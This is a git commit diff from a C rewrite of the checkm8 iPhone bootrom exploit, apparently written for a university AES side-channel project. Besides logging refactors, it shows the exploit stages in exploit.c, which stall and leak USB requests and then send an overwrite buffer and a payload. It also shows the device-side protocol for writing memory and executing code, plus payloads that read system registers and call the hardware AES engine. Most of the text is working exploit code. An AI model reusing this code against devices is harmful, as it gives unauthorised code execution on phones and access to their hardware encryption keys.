grg/checkm8_tool
1
0
Fork 0
Code Issues Pull Requests Releases Wiki Activity

Some execution fixes

Browse Source
This commit is contained in:
Gregor Haas
2019-12-14 20:06:56 -05:00
parent 3caa14603f
commit cc87e78cb2
14 changed files with 189 additions and 150 deletions
Download Patch File Download Diff File Expand all files Collapse all files

7
checkm8_payloads/CMakeLists.txt
View File

@@ -7,11 +7,14 @@ set(CMAKE_ASM_COMPILER /usr/bin/aarch64-linux-gnu-as)
set(CMAKE_OBJCOPY /usr/bin/aarch64-linux-gnu-objcopy)
set(CMAKE_C_FLAGS "-nostdlib -O")
set(PAYLOADS payload_aes payload_sysreg)
set(PAYLOADS payload_sync payload_aes payload_sysreg)
add_executable(payload_sync src/sync.c)
add_executable(payload_aes src/aes.c)
add_executable(payload_sysreg src/sysreg.c)
file(MAKE_DIRECTORY ${CMAKE_CURRENT_SOURCE_DIR}/bin)
file(MAKE_DIRECTORY ${CMAKE_CURRENT_SOURCE_DIR}/bin/)
set_directory_properties(PROPERTY ADDITIONAL_CLEAN_FILES "${CMAKE_CURRENT_SOURCE_DIR}/bin/")
foreach(BINARY ${PAYLOADS})
add_custom_command(TARGET ${BINARY} POST_BUILD
BYPRODUCTS ${CMAKE_CURRENT_SOURCE_DIR}/bin/${BINARY}.bin

7
checkm8_payloads/include/util.h Normal file
View File

@@ -0,0 +1,7 @@
#ifndef IPWNDFU_REWRITE_C_UTIL_H
#define IPWNDFU_REWRITE_C_UTIL_H
#define PAYLOAD_SECTION __attribute__ ((section (".payload_text")))
#define TEXT_SECTION __attribute__((section (".text")))
#endif //IPWNDFU_REWRITE_C_UTIL_H

5
checkm8_payloads/src/aes.c
View File

@@ -2,7 +2,9 @@
#include "brfunc_timing.h"
#include "brfunc_sep.h"
__attribute__ ((section (".payload_text")))
#include "util.h"
PAYLOAD_SECTION
int aes_hw_crypto_command(unsigned int cmd,
void *src,
void *dst,
@@ -45,6 +47,7 @@ int aes_hw_crypto_command(unsigned int cmd,
return 0;
}
TEXT_SECTION
int _start(unsigned int cmd,
void *src,
void *dst,

10
checkm8_payloads/src/sync.c Normal file
View File

@@ -0,0 +1,10 @@
#include "util.h"
TEXT_SECTION
void _start()
{
__asm__("dmb sy");
__asm__("ic iallu");
__asm__("dsb sy");
__asm__("isb");
}

5
checkm8_payloads/src/sysreg.c
View File

@@ -1,13 +1,16 @@
#include "util.h"
struct sysregs
{
long pt_base;
long evt_base;
};
TEXT_SECTION
struct sysregs _start()
{
struct sysregs res;
__asm__("mrs %0, ttbr1_el1" : "=r" (res.pt_base));
__asm__("mrs %0, ttbr0_el1" : "=r" (res.pt_base));
__asm__("mrs %0, vbar_el1" : "=r" (res.evt_base));
return res;

5
checkm8_payloads/test.c
View File

@@ -1,5 +0,0 @@
int _start(int b)
{
return b * 5;
}

6
checkm8_remote/include/command.h
View File

@@ -3,9 +3,9 @@
#include "checkm8.h"
int dev_memset(struct pwned_device *dev, long addr, unsigned char c, long len);
int dev_memcpy(struct pwned_device *dev, long dest, long src, long len);
int dev_exec(struct pwned_device *dev, long response_len, int nargs, unsigned long long *args);
int dev_memset(struct pwned_device *dev, long addr, unsigned char c, int len);
int dev_memcpy(struct pwned_device *dev, long dest, long src, int len);
int dev_exec(struct pwned_device *dev, int response_len, int nargs, unsigned long long *args);
int dev_read_memory(struct pwned_device *dev, long addr, long len);
int dev_write_memory();

3
checkm8_remote/include/payload.h
View File

@@ -5,9 +5,10 @@
#define PAYLOAD_AES_BIN CHECKM8_BIN_BASE "payloads/payload_aes.bin"
#define PAYLOAD_SYSREG_BIN CHECKM8_BIN_BASE "payloads/payload_sysreg.bin"
#define PAYLOAD_SYNC_BIN CHECKM8_BIN_BASE "payloads/payload_sync.bin"
typedef enum
{
PAYLOAD_SYNC,
PAYLOAD_AES,
PAYLOAD_SYSREG
} PAYLOAD_T;

18
checkm8_remote/main.c
View File

@@ -5,7 +5,7 @@
#include <stdarg.h>
#include <execinfo.h>
void checkm8_debug(const char *format, ...)
void checkm8_debug_indent(const char *format, ...)
{
#ifdef CHECKM8_LOGGING
void *traces[100];
@@ -14,7 +14,6 @@ void checkm8_debug(const char *format, ...)
{
printf("\t");
}
va_list args;
va_start (args, format);
@@ -23,6 +22,18 @@ void checkm8_debug(const char *format, ...)
#endif
}
void checkm8_debug_block(const char *format, ...)
{
#ifdef CHECKM8_LOGGING
va_list args;
va_start (args, format);
vprintf(format, args);
va_end(args);
#endif
}
int main()
{
struct pwned_device *dev = exploit_device();
@@ -32,6 +43,9 @@ int main()
return -1;
}
install_payload(dev, PAYLOAD_SYNC, DRAM);
install_payload(dev, PAYLOAD_SYSREG, DRAM);
execute_payload(dev, PAYLOAD_SYNC, 0);
execute_payload(dev, PAYLOAD_SYSREG, 0);
}

162
checkm8_remote/src/command.c
View File

@@ -8,7 +8,7 @@
int dfu_send_data(struct pwned_device *dev, unsigned char *data, long data_len)
{
checkm8_debug("dfu_send_data(dev = %p, data = %p, data_len = %li)\n", dev, data, data_len);
checkm8_debug_indent("dfu_send_data(dev = %p, data = %p, data_len = %li)\n", dev, data, data_len);
long index = 0, amount;
int ret;
@@ -17,39 +17,26 @@ int dfu_send_data(struct pwned_device *dev, unsigned char *data, long data_len)
if(data_len - index >= LIBUSB_MAX_PACKET_SIZE) amount = LIBUSB_MAX_PACKET_SIZE;
else amount = data_len - index;
checkm8_debug("\tsending chunk of size %li at index %li\n", amount, index);
checkm8_debug_indent("\tsending chunk of size %li at index %li\n", amount, index);
ret = libusb_control_transfer(dev->bundle->handle, 0x21, 1, 0, 0, &data[index], amount, 5000);
if(ret > 0) checkm8_debug("\ttransferred %i bytes\n", ret);
if(ret > 0) checkm8_debug_indent("\ttransferred %i bytes\n", ret);
else
{
checkm8_debug("\trequest failed with error code %i (%s)\n", ret, libusb_error_name(ret));
checkm8_debug_indent("\trequest failed with error code %i (%s)\n", ret, libusb_error_name(ret));
return CHECKM8_FAIL_XFER;
}
index += amount;
}
}
struct command_args
{
unsigned long long magic;
unsigned long long pad;
unsigned long long arg1;
unsigned long long arg2;
unsigned long long arg3;
unsigned long long arg4;
unsigned long long arg5;
unsigned long long arg6;
unsigned long long arg7;
long len;
};
static unsigned char nullbuf[16] = {0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0};
int command(struct pwned_device *dev, struct command_args *args, struct command_args *resp, long response_len)
int command(struct pwned_device *dev,
unsigned char *args, int arg_len,
unsigned char *resp, int response_len)
{
checkm8_debug("command(dev = %p, args = %p, resp = %p, response_len = %li)\n", dev, args, resp, response_len);
checkm8_debug_indent("command(dev = %p, args = %p, arg_len = %i resp = %p, response_len = %i)\n",
dev, args, arg_len, resp, response_len);
if(!is_device_bundle_open(dev)) return CHECKM8_FAIL_NODEV;
int ret;
@@ -57,54 +44,59 @@ int command(struct pwned_device *dev, struct command_args *args, struct command_
if(IS_CHECKM8_FAIL(ret)) return ret;
ret = libusb_control_transfer(dev->bundle->handle, 0x21, 1, 0, 0, nullbuf, 0, 100);
if(ret >= 0) checkm8_debug("\ttransferred %i bytes\n", ret);
if(ret >= 0) checkm8_debug_indent("\ttransferred %i bytes\n", ret);
else
{
checkm8_debug("\trequest failed with error code %i (%s)\n", ret, libusb_error_name(ret));
checkm8_debug_indent("\trequest failed with error code %i (%s)\n", ret, libusb_error_name(ret));
return CHECKM8_FAIL_XFER;
}
ret = libusb_control_transfer(dev->bundle->handle, 0xA1, 3, 0, 0, nullbuf, 6, 100);
if(ret >= 0) checkm8_debug("\ttransferred %i bytes\n", ret);
if(ret >= 0) checkm8_debug_indent("\ttransferred %i bytes\n", ret);
else
{
checkm8_debug("\trequest failed with error code %i (%s)\n", ret, libusb_error_name(ret));
checkm8_debug_indent("\trequest failed with error code %i (%s)\n", ret, libusb_error_name(ret));
return CHECKM8_FAIL_XFER;
}
ret = libusb_control_transfer(dev->bundle->handle, 0xA1, 3, 0, 0, nullbuf, 6, 100);
if(ret >= 0) checkm8_debug("\ttransferred %i bytes\n", ret);
if(ret >= 0) checkm8_debug_indent("\ttransferred %i bytes\n", ret);
else
{
checkm8_debug("\trequest failed with error code %i (%s)\n", ret, libusb_error_name(ret));
checkm8_debug_indent("\trequest failed with error code %i (%s)\n", ret, libusb_error_name(ret));
return CHECKM8_FAIL_XFER;
}
ret = dfu_send_data(dev, (unsigned char *) args, args->len);
ret = dfu_send_data(dev, args, arg_len);
if(IS_CHECKM8_FAIL(ret)) return ret;
if(response_len == 0)
{
ret = libusb_control_transfer(dev->bundle->handle, 0xA1, 2, 0xFFFF, 0, (unsigned char *) resp, response_len + 1, 100);
if(ret >= 0) checkm8_debug("\tfinal request transferred %i bytes\n", ret);
ret = libusb_control_transfer(dev->bundle->handle,
0xA1, 2, 0xFFFF, 0,
resp, response_len + 1,
100);
if(ret >= 0) checkm8_debug_indent("\tfinal request transferred %i bytes\n", ret);
else
{
checkm8_debug("\tfinal request failed with error code %i (%s)\n", ret, libusb_error_name(ret));
checkm8_debug_indent("\tfinal request failed with error code %i (%s)\n", ret, libusb_error_name(ret));
return CHECKM8_FAIL_XFER;
}
}
else
{
ret = libusb_control_transfer(dev->bundle->handle, 0xA1, 2, 0xFFFF, 0, (unsigned char *) resp, response_len, 100);
if(ret >= 0) checkm8_debug("\tfinal request transferred %i bytes\n", ret);
ret = libusb_control_transfer(dev->bundle->handle,
0xA1, 2, 0xFFFF, 0,
resp, response_len,
100);
if(ret >= 0) checkm8_debug_indent("\tfinal request transferred %i bytes\n", ret);
else
{
checkm8_debug("\tfinal request failed with error code %i (%s)\n", ret, libusb_error_name(ret));
checkm8_debug_indent("\tfinal request failed with error code %i (%s)\n", ret, libusb_error_name(ret));
return CHECKM8_FAIL_XFER;
}
}
checkm8_debug("\tgot response magic %lx (%s)\n", resp->magic, (char *) &resp->magic);
return CHECKM8_SUCCESS;
}
@@ -113,80 +105,72 @@ int command(struct pwned_device *dev, struct command_args *args, struct command_
#define MEMS_MAGIC 0x6d656d736d656d73ul // 'memsmems'[::-1]
#define DONE_MAGIC 0x646f6e65646f6e65ul // 'donedone'[::-1]
int dev_memset(struct pwned_device *dev, long addr, unsigned char c, long len)
int dev_memset(struct pwned_device *dev, long addr, unsigned char c, int len)
{
checkm8_debug("dev_memset(dev = %p, addr = %lx, c = %x, len = %li)\n", dev, addr, c, len);
int ret;
struct command_args *cmd_args, *cmd_resp;
cmd_args = calloc(1, sizeof(struct command_args));
cmd_resp = calloc(1, sizeof(struct command_args));
checkm8_debug_indent("dev_memset(dev = %p, addr = %lx, c = %x, len = %li)\n", dev, addr, c, len);
unsigned long long cmd_args[5];
cmd_args[0] = MEMS_MAGIC;
cmd_args[1] = 0;
cmd_args[2] = addr;
cmd_args[3] = (unsigned long long) c;
cmd_args[4] = len;
checkm8_debug("\tcmd_args = %p, cmd_resp = %p\n", cmd_args, cmd_resp);
cmd_args->magic = MEMS_MAGIC;
cmd_args->pad = 0;
cmd_args->arg1 = addr;
cmd_args->arg2 = (unsigned long) c;
cmd_args->arg3 = len;
cmd_args->len = 40;
ret = command(dev, cmd_args, cmd_resp, 8);
free(cmd_args);
free(cmd_resp);
return ret;
unsigned long long cmd_resp;
return command(dev,
(unsigned char *) &cmd_args, 5 * sizeof(unsigned long long),
(unsigned char *) &cmd_resp, 1 * sizeof(unsigned long long));
}
int dev_memcpy(struct pwned_device *dev, long dest, long src, long len)
int dev_memcpy(struct pwned_device *dev, long dest, long src, int len)
{
checkm8_debug("dev_memset(dev = %p, dest = %lx, src = %lx, len = %li)\n", dev, dest, src, len);
int ret;
struct command_args *cmd_args, *cmd_resp;
cmd_args = calloc(1, sizeof(struct command_args));
cmd_resp = calloc(1, sizeof(struct command_args));
checkm8_debug_indent("dev_memset(dev = %p, dest = %lx, src = %lx, len = %li)\n", dev, dest, src, len);
unsigned long long cmd_args[5];
cmd_args[0] = MEMC_MAGIC;
cmd_args[1] = 0;
cmd_args[2] = dest;
cmd_args[3] = src;
cmd_args[4] = len;
checkm8_debug("\tcmd_args = %p, cmd_resp = %p\n", cmd_args, cmd_resp);
cmd_args->magic = MEMC_MAGIC;
cmd_args->pad = 0;
cmd_args->arg1 = dest;
cmd_args->arg2 = src;
cmd_args->arg3 = len;
cmd_args->len = 40;
ret = command(dev, cmd_args, cmd_resp, 0);
free(cmd_args);
free(cmd_resp);
return ret;
unsigned long long cmd_resp;
return command(dev,
(unsigned char *) &cmd_args, 5 * sizeof(unsigned long long),
(unsigned char *) &cmd_resp, 1 * sizeof(unsigned long long));
}
int dev_exec(struct pwned_device *dev, long response_len, int nargs, unsigned long long *args)
int dev_exec(struct pwned_device *dev, int response_len, int nargs, unsigned long long *args)
{
checkm8_debug("dev_exec(dev = %p, response_len = %l, nargs = %i, args = %p\n", dev, response_len, nargs, args);
checkm8_debug_indent("dev_exec(dev = %p, response_len = %lu, nargs = %i, args = %p\n", dev, response_len, nargs,
args);
if(nargs > 7)
{
checkm8_debug("\ttoo many args\n");
checkm8_debug_indent("\ttoo many args\n");
return CHECKM8_FAIL_INVARGS;
}
int ret, i;
unsigned long long *argbase;
struct command_args *cmd_args, *cmd_resp;
cmd_args = calloc(1, sizeof(struct command_args));
cmd_resp = calloc(1, sizeof(struct command_args));
checkm8_debug_indent("\tcopying args\n");
checkm8_debug("\tcmd_args = %p, cmd_resp = %p\n", cmd_args, cmd_resp);
checkm8_debug("\tcopying args");
unsigned long long cmd_args[1 + nargs];
unsigned long long cmd_resp[1 + response_len];
cmd_args->magic = EXEC_MAGIC;
cmd_args->pad = 0;
argbase = &cmd_args->arg1;
cmd_args[0] = EXEC_MAGIC;
cmd_args[1] = 0;
argbase = (unsigned long long *) ((unsigned char *) &cmd_args[1] + 0);
for(i = 0; i < nargs; i++)
{
argbase[i] = args[i];
checkm8_debug("\t\t%ul\n", args[i]);
checkm8_debug_indent("\t\t0x%lx (0d%li) (%s)\n", args[i], args[i], (char *) &args[i]);
}
ret = command(dev, cmd_args, cmd_resp, 16 + response_len);
if(ret == CHECKM8_SUCCESS && cmd_resp->magic != DONE_MAGIC) return CHECKM8_FAIL_NOTDONE;
else return ret;
ret = command(dev,
(unsigned char *) cmd_args, (1 + nargs) * sizeof(unsigned long long),
(unsigned char *) cmd_resp, 16 + 8 * response_len);
if(ret == CHECKM8_SUCCESS && ((unsigned long *) cmd_resp)[0] != DONE_MAGIC) return CHECKM8_FAIL_NOTDONE;
else
{
checkm8_debug_indent("\tgot retval %lX\n", cmd_resp[1]);
return ret;
}
}

30
checkm8_remote/src/exploit.c
View File

@@ -12,20 +12,20 @@ typedef int(stage_function)(struct pwned_device *dev);
int complete_stage(struct pwned_device *device, stage_function *func)
{
checkm8_debug("complete_stage(dev = %p, func = %p)\n", device, func);
checkm8_debug_indent("complete_stage(dev = %p, func = %p)\n", device, func);
int ret;
ret = get_device_bundle(device);
if(ret == LIBUSB_ERROR_NO_DEVICE)
{
checkm8_debug("\tfailed to get device bundle\n");
checkm8_debug_indent("\tfailed to get device bundle\n");
return CHECKM8_FAIL_NODEV;
}
checkm8_debug("\tgot device bundle, calling function\n");
checkm8_debug_indent("\tgot device bundle, calling function\n");
ret = func(device);
checkm8_debug("\treleasing device bundle\n");
checkm8_debug_indent("\treleasing device bundle\n");
release_device_bundle(device);
return ret;
@@ -33,7 +33,7 @@ int complete_stage(struct pwned_device *device, stage_function *func)
int stage1_function(struct pwned_device *dev)
{
checkm8_debug("exploit stage 1\n");
checkm8_debug_indent("exploit stage 1\n");
unsigned int i;
stall(dev);
@@ -44,28 +44,28 @@ int stage1_function(struct pwned_device *dev)
usb_req_leak(dev);
no_leak(dev);
checkm8_debug("\treset\n");
checkm8_debug_indent("\treset\n");
libusb_reset_device(dev->bundle->handle);
return CHECKM8_SUCCESS;
}
int stage2_function(struct pwned_device *dev)
{
checkm8_debug("exploit stage 2\n");
checkm8_debug_indent("exploit stage 2\n");
unsigned char databuf[0x800];
memset(databuf, 'A', 0x800);
libusb1_async_ctrl_transfer(dev, 0x21, 1, 0, 0, databuf, 0x800, 1);
libusb1_no_error_ctrl_transfer(dev, 0x21, 4, 0, 0, NULL, 0, 0);
checkm8_debug("\treset\n");
checkm8_debug_indent("\treset\n");
libusb_reset_device(dev->bundle->handle);
return CHECKM8_SUCCESS;
}
int stage3_function(struct pwned_device *dev)
{
checkm8_debug("exploit stage 3\n");
checkm8_debug_indent("exploit stage 3\n");
unsigned char overwrite_buf[1524];
FILE *overwrite_file = fopen(CHECKM8_BIN_BASE "overwrite.bin", "r");
fread(overwrite_buf, 1524, 1, overwrite_file);
@@ -79,28 +79,28 @@ int stage3_function(struct pwned_device *dev)
usb_req_stall(dev);
usb_req_leak(dev);
checkm8_debug("\ttransferring overwrite\n");
checkm8_debug_indent("\ttransferring overwrite\n");
libusb1_no_error_ctrl_transfer(dev, 0, 0, 0, 0, overwrite_buf, 1524, 100);
checkm8_debug("\ttransferring payload\n");
checkm8_debug_indent("\ttransferring payload\n");
libusb1_no_error_ctrl_transfer(dev, 0x21, 1, 0, 0, payload_buf, 2048, 100);
libusb1_no_error_ctrl_transfer(dev, 0x21, 1, 0, 0, &payload_buf[2048], 352, 100);
checkm8_debug("reset\n");
checkm8_debug_indent("reset\n");
libusb_reset_device(dev->bundle->handle);
return CHECKM8_SUCCESS;
}
int check_function(struct pwned_device *dev)
{
checkm8_debug("checking device serial\n");
checkm8_debug_indent("checking device serial\n");
unsigned char serial_buf[128];
unsigned int i;
struct libusb_device_handle *handle = dev->bundle->handle;
struct libusb_device_descriptor *desc = dev->bundle->descriptor;
libusb_get_string_descriptor_ascii(handle, desc->iSerialNumber, serial_buf, sizeof(serial_buf));
checkm8_debug("\tgot serial %s\n", serial_buf);
checkm8_debug_indent("\tgot serial %s\n", serial_buf);
for(i = 0; i < 13; i++)
{
@@ -121,7 +121,7 @@ struct pwned_device *exploit_device()
res->idVendor = DEV_IDVENDOR;
res->idProduct = DEV_IDPRODUCT;
checkm8_debug("exploit_device() -> dev = %p\n", res);
checkm8_debug_indent("exploit_device() -> dev = %p\n", res);
int ret = complete_stage(res, check_function);
if(ret == CHECKM8_SUCCESS)

47
checkm8_remote/src/libusb_helpers.c
View File

@@ -9,10 +9,10 @@
int get_device_bundle(struct pwned_device *dev)
{
checkm8_debug("get_device_bundle(dev = %p)\n", dev);
checkm8_debug_indent("get_device_bundle(dev = %p)\n", dev);
if(dev->bundle->ctx == NULL)
{
checkm8_debug("\tbundle ctx is NULL, allocating\n");
checkm8_debug_indent("\tbundle ctx is NULL, allocating\n");
dev->bundle->ctx = malloc(sizeof(libusb_context));
libusb_init(&dev->bundle->ctx);
}
@@ -22,7 +22,7 @@ int get_device_bundle(struct pwned_device *dev)
dev->bundle->descriptor->idVendor == dev->idVendor &&
dev->bundle->descriptor->idProduct == dev->idProduct)
{
checkm8_debug("\tbundle is already valid\n");
checkm8_debug_indent("\tbundle is already valid\n");
return LIBUSB_SUCCESS;
}
}
@@ -31,7 +31,7 @@ int get_device_bundle(struct pwned_device *dev)
int usb_dev_count, ret = LIBUSB_ERROR_NO_DEVICE;
usb_dev_count = libusb_get_device_list(dev->bundle->ctx, &usb_device_list);
checkm8_debug("\tfound %i USB devices\n", usb_dev_count);
checkm8_debug_indent("\tfound %i USB devices\n", usb_dev_count);
dev->bundle->device = NULL;
dev->bundle->handle = NULL;
@@ -45,24 +45,24 @@ int get_device_bundle(struct pwned_device *dev)
if(dev->bundle->descriptor->idVendor == dev->idVendor &&
dev->bundle->descriptor->idProduct == dev->idProduct)
{
checkm8_debug("\tchecking device %i ... match!\n", i);
checkm8_debug_indent("\tchecking device %i ... match!\n", i);
ret = LIBUSB_SUCCESS;
break;
}
checkm8_debug("\tchecking device %i ... no match\n", i);
checkm8_debug_indent("\tchecking device %i ... no match\n", i);
}
libusb_free_device_list(usb_device_list, usb_dev_count);
if(ret == LIBUSB_SUCCESS)
{
checkm8_debug("\topening device and returning success\n");
checkm8_debug_indent("\topening device and returning success\n");
libusb_open(dev->bundle->device, &dev->bundle->handle);
libusb_set_auto_detach_kernel_driver(dev->bundle->handle, 1);
}
else
{
checkm8_debug("\tcould not find a matching device\n");
checkm8_debug_indent("\tcould not find a matching device\n");
libusb_exit(dev->bundle->ctx);
free(dev->bundle->ctx);
free(dev->bundle->descriptor);
@@ -78,10 +78,10 @@ int get_device_bundle(struct pwned_device *dev)
int release_device_bundle(struct pwned_device *dev)
{
checkm8_debug("release_device_bundle(dev = %p)\n", dev);
checkm8_debug_indent("release_device_bundle(dev = %p)\n", dev);
if(dev->bundle->handle != NULL)
{
checkm8_debug("\tclosing handle\n");
checkm8_debug_indent("\tclosing handle\n");
libusb_close(dev->bundle->handle);
dev->bundle->handle = NULL;
}
@@ -90,7 +90,7 @@ int release_device_bundle(struct pwned_device *dev)
if(dev->bundle->ctx != NULL)
{
checkm8_debug("\texiting context\n");;
checkm8_debug_indent("\texiting context\n");;
libusb_exit(dev->bundle->ctx);
free(dev->bundle->ctx);
dev->bundle->ctx = NULL;
@@ -98,7 +98,7 @@ int release_device_bundle(struct pwned_device *dev)
if(dev->bundle->descriptor != NULL)
{
checkm8_debug("\tfreeing device descriptor\n");
checkm8_debug_indent("\tfreeing device descriptor\n");
free(dev->bundle->descriptor);
dev->bundle->descriptor = NULL;
}
@@ -114,10 +114,10 @@ int is_device_bundle_open(struct pwned_device *dev)
void LIBUSB_CALL async_ctrl_transfer_cb(struct libusb_transfer *transfer)
{
checkm8_debug("transfer status: %s (%i / %i)\n",
libusb_error_name(transfer->status),
transfer->actual_length,
transfer->length);
checkm8_debug_indent("transfer status: %s (%i / %i)\n",
libusb_error_name(transfer->status),
transfer->actual_length,
transfer->length);
}
int libusb1_async_ctrl_transfer(struct pwned_device *dev,
@@ -126,7 +126,8 @@ int libusb1_async_ctrl_transfer(struct pwned_device *dev,
unsigned char *data, unsigned short data_len,
unsigned int timeout)
{
checkm8_debug("async_ctrl_transfer(dev = %p, bmRequestType = %i, bRequest = %i, wValue = %i, wIndex = %i, data = %p, data_len = %i, timeout = %i)\n",
checkm8_debug_indent(
"async_ctrl_transfer(dev = %p, bmRequestType = %i, bRequest = %i, wValue = %i, wIndex = %i, data = %p, data_len = %i, timeout = %i)\n",
dev, bmRequestType, bRequest, wValue, wIndex, data, data_len, timeout);
struct timeval start, end;
unsigned char usb_transfer_buf[8 + data_len];
@@ -139,11 +140,11 @@ int libusb1_async_ctrl_transfer(struct pwned_device *dev,
memcpy(&usb_transfer_buf[8], data, data_len);
libusb_fill_control_transfer(usb_transfer, dev->bundle->handle, usb_transfer_buf, async_ctrl_transfer_cb, NULL, 1);
checkm8_debug("\tsubmiting urb\n");
checkm8_debug_indent("\tsubmiting urb\n");
ret = libusb_submit_transfer(usb_transfer);
if(ret != 0)
{
checkm8_debug("\tfailed to submit async USB transfer: %s\n", libusb_error_name(ret));
checkm8_debug_indent("\tfailed to submit async USB transfer: %s\n", libusb_error_name(ret));
libusb_free_transfer(usb_transfer);
return CHECKM8_FAIL_XFER;
}
@@ -156,7 +157,7 @@ int libusb1_async_ctrl_transfer(struct pwned_device *dev,
ret = libusb_cancel_transfer(usb_transfer);
if(ret != 0)
{
checkm8_debug("\tfailed to cancel async USB transfer: %s\n", libusb_error_name(ret));
checkm8_debug_indent("\tfailed to cancel async USB transfer: %s\n", libusb_error_name(ret));
return CHECKM8_FAIL_XFER;
}
@@ -171,7 +172,7 @@ int libusb1_no_error_ctrl_transfer(struct pwned_device *dev,
unsigned char *data, unsigned short data_len,
unsigned int timeout)
{
checkm8_debug(
checkm8_debug_indent(
"no_error_ctrl_transfer(dev = %p, bmRequestType = %i, bRequest = %i, wValue = %i, wIndex = %i, data = %p, data_len = %i, timeout = %i)\n",
dev, bmRequestType, bRequest, wValue, wIndex, data, data_len, timeout);
int ret;
@@ -183,14 +184,14 @@ int libusb1_no_error_ctrl_transfer(struct pwned_device *dev,
ret = libusb_claim_interface(dev->bundle->handle, interface);
if(ret > 0)
{
checkm8_debug("\tfailed to claim interface: %s\n", libusb_error_name(ret));
checkm8_debug_indent("\tfailed to claim interface: %s\n", libusb_error_name(ret));
return CHECKM8_FAIL_XFER;
}
}
ret = libusb_control_transfer(dev->bundle->handle, bmRequestType, bRequest, wValue, wIndex, data, data_len,
timeout);
checkm8_debug("\tgot error %s but ignoring\n", libusb_error_name(ret));
checkm8_debug_indent("\tgot error %s but ignoring\n", libusb_error_name(ret));
return CHECKM8_SUCCESS;
}

29
checkm8_remote/src/payload.c
View File

@@ -14,7 +14,7 @@ struct payload
unsigned char *data;
long len;
long install_base;
long long install_base;
struct payload *next;
struct payload *prev;
};
@@ -27,6 +27,10 @@ struct payload *get_payload(PAYLOAD_T p)
switch(p)
{
case PAYLOAD_SYNC:
path = PAYLOAD_SYNC_BIN;
break;
case PAYLOAD_AES:
path = PAYLOAD_AES_BIN;
break;
@@ -69,9 +73,12 @@ void free_payload(struct payload *p)
free(p);
}
long get_address(struct pwned_device *dev, LOCATION_T l)
long long curr_address = 0x180150000;
long long get_address(struct pwned_device *dev, LOCATION_T l)
{
return 0x180151000;
long long ret = curr_address;
curr_address += 0x1000;
return ret;
}
@@ -122,9 +129,10 @@ int *dev_unlink_payload(struct pwned_device *dev, struct payload *pl)
int install_payload(struct pwned_device *dev, PAYLOAD_T p, LOCATION_T loc)
{
checkm8_debug_indent("install_payload(dev = %p, p = %i, loc = %i)\n", dev, p, loc);
int i, ret;
struct payload *pl = get_payload(p);
long addr = get_address(dev, loc);
long long addr = get_address(dev, loc);
if(pl == NULL || addr == -1) return CHECKM8_FAIL_INVARGS;
@@ -133,6 +141,7 @@ int install_payload(struct pwned_device *dev, PAYLOAD_T p, LOCATION_T loc)
for(i = 0; i < pl->len; i++)
{
checkm8_debug_indent("\tcopying payload byte %i of %i\n", i, pl->len);
ret = dev_memset(dev, addr + i, pl->data[i], 1);
if(IS_CHECKM8_FAIL(ret))
{
@@ -141,6 +150,7 @@ int install_payload(struct pwned_device *dev, PAYLOAD_T p, LOCATION_T loc)
}
}
checkm8_debug_indent("\tdone copying and linking payload");
pl->install_base = addr;
dev_link_payload(dev, pl);
release_device_bundle(dev);
@@ -154,25 +164,32 @@ int uninstall_payload(struct pwned_device *dev, PAYLOAD_T p)
int execute_payload(struct pwned_device *dev, PAYLOAD_T p, int nargs, ...)
{
checkm8_debug_indent("execute_payload(dev = %p, p = %i, nargs = %i, ...)\n", dev, p, nargs);
int ret, i;
struct payload *pl;
if((pl = dev_retrieve_payload(dev, p)) == NULL) return CHECKM8_FAIL_NOINST;
if((pl = dev_retrieve_payload(dev, p)) == NULL)
{
checkm8_debug_indent("\tpayload is not installed\n");
return CHECKM8_FAIL_NOINST;
}
ret = get_device_bundle(dev);
if(IS_CHECKM8_FAIL(ret)) return ret;
unsigned long long args[nargs + 1];
args[0] = pl->install_base;
checkm8_debug_indent("\tinstall base is 0x%lX\n", args[0]);
va_list arg_list;
va_start(arg_list, nargs);
for(i = 0; i < nargs; i++)
{
args[i + 1] = va_arg(arg_list, unsigned long long);
checkm8_debug_indent("\textracted arg %li\n", args[i + 1]);
}
va_end(arg_list);
ret = dev_exec(dev, 16, nargs, args);
ret = dev_exec(dev, 2, nargs + 1, args);
release_device_bundle(dev);
return ret;
}

5
include/checkm8_config.h
View File

@@ -4,8 +4,9 @@
//#define LIBUSB_LOGGING
#define CHECKM8_LOGGING
#define CHECKM8_PLATFORM 8010
#define CHECKM8_BIN_BASE "/home/grg/Projects/School/NCSU/iphone_aes_sc/checkm8_remote/bin/"
#define CHECKM8_BIN_BASE "/home/grg/Projects/School/NCSU/iphone_aes_sc/ipwndfu_rewrite_c/checkm8_remote/bin/"
void checkm8_debug(const char *format, ...);
void checkm8_debug_indent(const char *format, ...);
void checkm8_debug_block(const char *format, ...);
#endif //IPWNDFU_REWRITE_C_CHECKM8_CONFIG_H